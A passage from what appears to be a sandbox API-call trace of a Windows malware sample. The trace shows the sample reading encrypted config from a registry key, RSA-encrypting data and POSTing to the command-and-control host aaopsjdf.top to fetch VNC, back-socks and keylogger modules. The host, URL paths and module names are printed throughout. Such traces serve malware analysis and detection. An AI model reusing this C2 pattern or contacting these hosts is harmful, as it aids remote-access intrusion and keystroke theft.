phkResult=0x28ff89c*=0xb4) returned 0x0 [0328.961] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x3, lpData=0x0, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0328.961] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x238f968, lpcbData=0x28ff8b0*=0x6f0 | out: lpType=0x28ff8c8*=0x3, lpData=0x238f968*, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0328.961] RegCloseKey (hKey=0xb4) returned 0x0 [0328.961] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/vnc64_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0328.961] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x3b, wMilliseconds=0x2f0)) [0328.962] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0328.962] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0328.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0328.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0xb4) returned 0x0 [0328.962] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x3, lpData=0x0, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0328.962] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x238f968, lpcbData=0x28ff4f8*=0x6f0 | out: lpType=0x28ff510*=0x3, lpData=0x238f968*, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0328.962] RegCloseKey (hKey=0xb4) returned 0x0 [0328.962] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0328.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0328.962] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0328.962] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x424080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240b0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240b8*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b3d8) returned 1 [0328.962] LocalFree (hMem=0x424080) returned 0x0 [0328.962] wvnsprintfA (in: pszDest=0x235d9a8, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610619") returned 10 [0328.962] CryptEncrypt (in: hKey=0x45b3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0328.962] CryptEncrypt (in: hKey=0x45b3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0328.963] CryptDestroyKey (hKey=0x45b3d8) returned 1 [0328.963] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/vnc64_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0328.963] wvnsprintfA (in: pszDest=0x238e350, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew") returned 62 [0328.963] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0328.963] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0328.963] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0328.963] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0328.963] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0328.963] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0328.963] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0328.963] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x23cf8b0, dwOptionalLength=0x2c0) returned 0 [0329.183] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0329.183] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0329.183] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x23cf8b0*, dwOptionalLength=0x2c0 | out: lpOptional=0x23cf8b0*) returned 1 [0329.779] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0329.779] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x0 [0329.779] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0329.780] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0329.780] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0329.780] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0329.780] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0xb4) returned 0x0 [0329.780] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0329.780] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x238f968, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x238f968*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0329.780] RegCloseKey (hKey=0xb4) returned 0x0 [0329.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: phkResult=0x28ff89c*=0xb4) returned 0x0 [0329.781] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x3, lpData=0x0, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0329.781] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x238f968, lpcbData=0x28ff8b0*=0x6f0 | out: lpType=0x28ff8c8*=0x3, lpData=0x238f968*, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0329.781] RegCloseKey (hKey=0xb4) returned 0x0 [0329.781] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/backsocks_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0329.781] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x39, wSecond=0x0, wMilliseconds=0x243)) [0329.781] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0329.781] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0329.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0329.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0xb4) returned 0x0 [0329.781] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x3, lpData=0x0, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0329.782] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x238f968, lpcbData=0x28ff4f8*=0x6f0 | out: lpType=0x28ff510*=0x3, lpData=0x238f968*, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0329.782] RegCloseKey (hKey=0xb4) returned 0x0 [0329.782] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0329.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0329.782] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0329.782] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x424080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240b0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240b8*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b3d8) returned 1 [0329.782] LocalFree (hMem=0x424080) returned 0x0 [0329.782] wvnsprintfA (in: pszDest=0x235db38, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610620") returned 10 [0329.782] CryptEncrypt (in: hKey=0x45b3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0329.782] CryptEncrypt (in: hKey=0x45b3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0329.782] CryptDestroyKey (hKey=0x45b3d8) returned 1 [0329.782] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/backsocks_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0329.782] wvnsprintfA (in: pszDest=0x238e350, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw") returned 55 [0329.782] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0329.782] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0329.782] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0329.782] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0329.782] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0329.783] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0329.783] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0329.783] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x23cf8b0, dwOptionalLength=0x2c0) returned 0 [0329.985] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0329.985] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0329.985] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x23cf8b0*, dwOptionalLength=0x2c0 | out: lpOptional=0x23cf8b0*) returned 1 [0330.544] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0330.545] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x0 [0330.545] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0330.546] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0330.546] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0330.546] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0330.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0x4c) returned 0x0 [0330.546] RegQueryValueExW (in: hKey=0x4c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0330.546] RegQueryValueExW (in: hKey=0x4c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x238f968, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x238f968*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0330.546] RegCloseKey (hKey=0x4c) returned 0x0 [0330.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: phkResult=0x28ff89c*=0x4c) returned 0x0 [0330.546] RegQueryValueExW (in: hKey=0x4c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x3, lpData=0x0, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0330.546] RegQueryValueExW (in: hKey=0x4c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x238f968, lpcbData=0x28ff8b0*=0x6f0 | out: lpType=0x28ff8c8*=0x3, lpData=0x238f968*, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0330.546] RegCloseKey (hKey=0x4c) returned 0x0 [0330.546] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/keylogger_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0330.546] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x39, wSecond=0x1, wMilliseconds=0x157)) [0330.547] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0330.547] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0330.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0330.547] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0x4c) returned 0x0 [0330.547] RegQueryValueExW (in: hKey=0x4c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x3, lpData=0x0, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0330.547] RegQueryValueExW (in: hKey=0x4c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x238f968, lpcbData=0x28ff4f8*=0x6f0 | out: lpType=0x28ff510*=0x3, lpData=0x238f968*, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0330.547] RegCloseKey (hKey=0x4c) returned 0x0 [0330.547] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0330.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0330.547] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0330.547] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x424080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240b0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240b8*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b958) returned 1 [0330.547] LocalFree (hMem=0x424080) returned 0x0 [0330.547] wvnsprintfA (in: pszDest=0x235d700, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610621") returned 10 [0330.547] CryptEncrypt (in: hKey=0x45b958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0330.547] CryptEncrypt (in: hKey=0x45b958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0330.547] CryptDestroyKey (hKey=0x45b958) returned 1 [0330.548] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/keylogger_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0330.548] wvnsprintfA (in: pszDest=0x238e350, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA") returned 54 [0330.548] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0330.548] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0330.548] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0330.548] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0330.548] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0330.548] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0330.548] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0330.548] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91H", dwHeadersLength=0x13, lpOptional=0x238f340, dwOptionalLength=0x2c0) returned 0 [0330.778] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0330.778] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0330.778] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91H", dwHeadersLength=0x13, lpOptional=0x238f340*, dwOptionalLength=0x2c0 | out: lpOptional=0x238f340*) returned 1 [0331.351] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0331.351] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x0 [0331.352] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0331.354] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0331.354] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0331.354] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0331.355] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fed88 | out: phkResult=0x28fed88*=0xb4) returned 0x0 [0331.355] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fedb4, lpData=0x0, lpcbData=0x28fed9c*=0x0 | out: lpType=0x28fedb4*=0x3, lpData=0x0, lpcbData=0x28fed9c*=0x6f0) returned 0x0 [0331.355] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fedb4, lpData=0x238f968, lpcbData=0x28fed9c*=0x6f0 | out: lpType=0x28fedb4*=0x3, lpData=0x238f968*, lpcbData=0x28fed9c*=0x6f0) returned 0x0 [0331.355] RegCloseKey (hKey=0xb4) returned 0x0 [0331.356] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\azuqkihi") returned 0 [0331.356] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xekeov") returned 0 [0331.356] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x1b7740) returned 0x0 Thread: id = 213 os_tid = 0x5b0 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="A8") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="F7") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="13") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="84") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="33") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: pszDest="2E") returned 2 [0312.962] wvnsprintfW (in: pszDest=0x298f5d0, cchDest=3, pszFmt="%02X", arglist=0x298f5ac | out: 